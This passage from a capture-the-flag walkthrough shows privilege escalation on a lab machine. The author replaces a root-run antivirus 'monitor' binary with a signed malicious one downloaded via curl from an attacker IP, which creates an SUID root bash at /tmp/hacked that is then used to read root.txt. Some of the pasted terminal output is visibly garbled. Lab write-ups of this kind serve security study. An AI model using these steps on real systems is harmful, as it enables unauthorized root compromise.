12
--- 64-bit ELF file, version 1 (CURRENT), little endian.
13
--- 28 sections detected.
14
--- Section 0006 [.text] detected.
15
--- Length of section [.text]: 501773
16
--- Signature size of [.text]: 458
17
--- Writing signature to file: .text_sig
18
--- Removing temporary signature file: .text_sig
19

20
$ readelf -S monitor | grep sig
21
[28] .text_sig          PROGBITS        0000000000000000000000       000be198

Upload the crafted malicious monitor binary to overwrite the original.

1
eric@era:/opt/AV/periodic-checks$ mv monitor monitor.bak
2

3
eric@era:/opt/AV/periodic-checks$ curl -O 10.10.12.7/monitor
4
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
5
                                 Dload  Upload   Total   Spent    Left  Speed
6
100  761k  100  761k    0     0   158k      0  0:00:04  0:00:04 --:--:--  174k
7

8
eric@era:/opt/AV/periodic-checks$ chmod +x monitor
9

10
eric@era:/opt/AV/periodic-checks$ ls -l
11
ls -l
12
total 788
13
-rwxrwxr-x 1 eric eric 778568 Jul 27 10:36 monitor
14
-rwxrw---- 1 root devs  16544 Jul 27 10:36 monitor.bak
15
-rw-rw---- 1 root devs    103 Jul 27 10:36 status.log

Until the log updates and replies SUCCESS:

1
eric@era:/opt/AV/periodic-checks$ tail st*
2

3
[ERROR] Executable not signed. Tampering attempt detected. Skipping.
4
[*] System scan initiated...
5
[*] No threats detected. Shutting down...
6
[SUCCESS] No threats detected.

When executed, the compromised monitor will create an SUID-enabled bash binary at /tmp/hacked with root privileges.

1
er.ic@era: /opt/AV/pertodic-checks$ cat st*
2
cat st*
3

4
[SUCCESS] No threats detected.
5
eric@era:/opt/AV/periodic-checks$ cat st*
6
cat st*
7

8
[SUCCESS] No threats detected.
9
eric@era: /opt/AV/periodic-checks$ ll /tmp
10

11
ll /tmp
12

13
total 1416
14

15
drwxrwxrwt 13 root root 4096 Jul 27 of
16
drwxr-xr-x 20 root root 4096 Jul 22 08:41 ../
17
drwxrwxrwt. root root 4096 Jul 27 -ICE-unix/
18
drwxrwxrwt root root 4096 Jul 27 -Test-unix/
19
drwxrwxrwt root root 4096 Jul 27 -X11-unix/
20
drwxrwxrwt root root 4096 Jul 27 -XIM-untx/
21
drwxrwxrwt root root 4096 Jul 27 02:48 .font-unix/
22
-rwsr-Sr-x root root 1396520 Jul 27 10:45 hacked*
23
...
24

25
eric@era:/opt/AV/periodic-checks$ /tmp/hacked -p
26
/tmp/hacked -p
27
hacked-5.1# id
28
id
29
uid=1000(eric) gid=1000(eric) euid=0(root) egid=0(root) groups=0( root) ,1000(eric),1001( devs)
30
hacked-5.1# cat /root/root.txt
31
f85s9ss5*****

ROOTED

alt text